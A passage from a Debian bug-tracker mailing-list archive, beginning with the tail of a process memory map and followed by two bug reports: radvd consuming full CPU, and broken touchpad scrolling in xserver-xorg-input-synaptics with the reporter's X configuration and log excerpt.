/usr/lib/libpils.so.1.0.0 7f4f7f619000-7f4f7f61a000 rw-p 7000 09:01 7045179 /usr/lib/libpils.so.1.0.0 7f4f7f61a000-7f4f7f621000 r-xp 09:01 2659952 /usr/lib/libltdl.so.3.1.6 7f4f7f621000-7f4f7f82 ---p 7000 09:01 2659952 /usr/lib/libltdl.so.3.1.6 7f4f7f82-7f4f7f821000 rw-p 6000 09:01 2659952 /usr/lib/libltdl.so.3.1.6 7f4f7f821000-7f4f7f823000 r-xp 09:01 3580240 /lib/libdl-2.7.so 7f4f7f823000-7f4f7fa23000 ---p 2000 09:01 3580240 /lib/libdl-2.7.so 7f4f7fa23000-7f4f7fa25000 rw-p 2000 09:01 3580240 /lib/libdl-2.7.so 7f4f7fa25000-7f4f7fa2d000 r-xp 09:01 3580244 /lib/librt-2.7.so 7f4f7fa2d000-7f4f7fc2c000 ---p 8000 09:01 3580244 /lib/librt-2.7.so 7f4f7fc2c000-7f4f7fc2e000 rw-p 7000 09:01 3580244 /lib/librt-2.7.so 7f4f7fc2e000-7f4f7fc39000 r-xp 09:01 3579927 /lib/libpam.so.0.81.12 7f4f7fc39000-7f4f7fe38000 ---p b000 09:01 3579927 /lib/libpam.so.0.81.12 7f4f7fe38000-7f4f7fe39000 rw-p a000 09:01 3579927 /lib/libpam.so.0.81.12 7f4f7fe39000-7f4f7fe3c000 r-xp 09:01 3579973 /lib/libuuid.so.1.2 7f4f7fe3c000-7f4f8003c000 ---p 3000 09:01 3579973 /lib/libuuid.so.1.2 7f4f8003c000-7f4f8003d000 rw-p 3000 09:01 3579973 /lib/libuuid.so.1.2 7f4f8003d000-7f4f80187000 r-xp 09:01 3580243 /lib/libc-2.7.so 7f4f80187000-7f4f80386000 ---p 0014a000 09:01 3580243 /lib/libc-2.7.so 7f4f80386000-7f4f80389000 r--p 00149000 09:01 3580243 /lib/libc-2.7.so 7f4f80389000-7f4f8038b000 rw-p 0014c000 09:01 3580243 /lib/libc-2.7.so 7f4f8038b000-7f4f8039 rw-p 00:00 0 7f4f8039-7f4f804e2000 r-xp 09:01 2659812 /usr/lib/libxml2.so.2.6.32 7f4f804e2000-7f4f806e1000 ---p 00152000 09:01 2659812 /usr/lib/libxml2.so.2.6.32 7f4f806e1000-7f4f806eb000 rw-p 00151000 09:01 2659812 /usr/lib/libxml2.so.2.6.32 7f4f806eb000-7f4f806ec000 rw-p 00:00 0 7f4f806ec000-7f4f80702000 r-xp 09:0
Bug#588689: radvd eating 100% CPU
Package: radvd Version: 1:1.1-3 Severity: important Hi, Over the time, on my system radvd eats 100% of cpu. The init script can't restart it. I do have to kill -9 it and then start it. Thanks Laurent -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.34-p390 (SMP w/4 CPU cores) Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15) Shell: /bin/sh linked to /bin/bash Versions of packages radvd depends on: ii adduser 3.110add and remove users and groups ii libc6 2.7-18lenny4 GNU C Library: Shared libraries radvd recommends no packages. radvd suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#628833: xserver-xorg-input-synaptics: Scrolling broken since 1.4.x
Package: xserver-xorg-input-synaptics Version: 1.4.0-1+b1 Severity: normal Hi, Since this version i can't use the vertical/horizontal scrolling areas from my laptop (Sony Vaio Z1 series) -- Package-specific info: X server symlink status: lrwxrwxrwx 1 root root 13 Mar 28 2008 /etc/X11/X -> /usr/bin/Xorg -rwxr-xr-x 1 root root 1972704 Apr 28 14:26 /usr/bin/Xorg Diversions concerning libGL are in place diversion of /usr/lib/libGL.so to /usr/lib/nvidia/diversions/libGL.so by libgl1-nvidia-alternatives diversion of /usr/lib/libGL.so.1 to /usr/lib/nvidia/diversions/libGL.so.1 by libgl1-nvidia-alternatives diversion of /usr/lib/xorg/modules/extensions/libglx.so to /usr/lib/nvidia/diversions/libglx.so by libglx-nvidia-alternatives diversion of /usr/lib/libGL.so.1.2 to /usr/lib/nvidia/diversions/libGL.so.1.2 by libgl1-nvidia-alternatives diversion of /usr/lib/debug/usr/lib/xorg/modules/extensions/libglx.so to /usr/lib/nvidia/diversions/libglx.so.dbg by libglx-nvidia-alternatives VGA-compatible devices on PCI bus: -- 00:02.0 VGA compatible controller [0300]: Intel Corporation Core Processor Integrated Graphics Controller [8086:0046] (rev 02) Xorg X server configuration file status: lrwxrwxrwx 1 root root 26 Jun 1 18:53 /etc/X11/xorg.conf -> /etc/X11/xorg.conf.stamina Contents of /etc/X11/xorg.conf: --- Section "InputDevice" Identifier "Configured Mouse" Driver "mouse" Option "CorePointer" Option "Device""/dev/input/mice" Option "Protocol" "ImPS/2" Option "Emulate3Buttons" "true" EndSection Section "InputDevice" Identifier "Synaptics Touchpad" Driver "synaptics" Option "SendCoreEvents""true" Option "Device""/dev/psaux" Option "Protocol" "auto-dev" Option "HorizScrollDelta" "0" Option "ZAxisMapping" "4 5 6 7" Option "TapButton1""1" Option "VertEdgeScroll""true" Option "HorizEdgeScroll" "true" Option "VertTwoFingerScroll" "true" Option "HorizTwoFingerScroll" "true" EndSection Section "Screen" Identifier "Default Screen" Monitor "DELL LCD INT" DefaultDepth24 SubSection "Display" Modes "1920x1080" EndSubSection EndSection Section "Monitor" Identifier "DELL LCD INT" Option "DPMS" # HorizSync 30-83 # VertRefresh 56-76 EndSection Section "InputDevice" Identifier "Generic Keyboard" Driver "kbd" Option "CoreKeyboard" Option "XkbRules" "xorg" Option "XkbModel" "pc105" Option "XkbLayout" "fr" EndSection Section "ServerFlags" Option "blank time" "2" # temps avant que l'cran devienne noir : 1 minute Option "off time" "5" # dpms : off time # Option "standby time" "5" Option "suspend time" "5" # Option "screen blank" "5" Option "AutoAddDevices" "false" EndSection Section "ServerLayout" Identifier "Default Layout" Screen "Default Screen" InputDevice "Generic Keyboard" InputDevice "Configured Mouse" InputDevice "Synaptics Touchpad" EndSection Section "Module" Load"ddc" Load"vbe" EndSection /etc/X11/xorg.conf.d does not exist. KMS configuration files: /etc/modprobe.d/i915-kms.conf: options i915 modeset=1 /etc/modprobe.d/radeon-kms.conf: options radeon modeset=1 Kernel version (/proc/version): --- Linux version 2.6.39-vaio-30-cpuidle (root@uranus) (gcc version 4.5.2 (Debian 4.5.2-11) ) #1 SMP PREEMPT Sat May 21 23:31:11 CEST 2011 Xorg X server log files on system: -- -rw-r--r-- 1 root root 24375 Nov 18 2010 /var/log/Xorg.20.log -rw-r--r-- 1 root root 16926 May 27 19:05 /var/log/Xorg.1.log -rw-r--r-- 1 root root 29875 Jun 1 19:29 /var/log/Xorg.0.log Contents of most recent Xorg X server log file (/var/log/Xorg.0.log): - [ 2184.936] X.Org X Server 1.10.1 Release Date: 2011-04-15 [ 2184.936] X Protocol Version 11, Revision 0 [ 2184.936] Build Operating System: Linux 2.6.32-5-amd64 x86_64 Debian [ 2184.936] Current Operating System: Linux uranus 2.6.39-vaio-30-cpuidle #1 SMP PREEMPT Sat May 21 23:31:11 CEST 2011 x86_64 [ 2184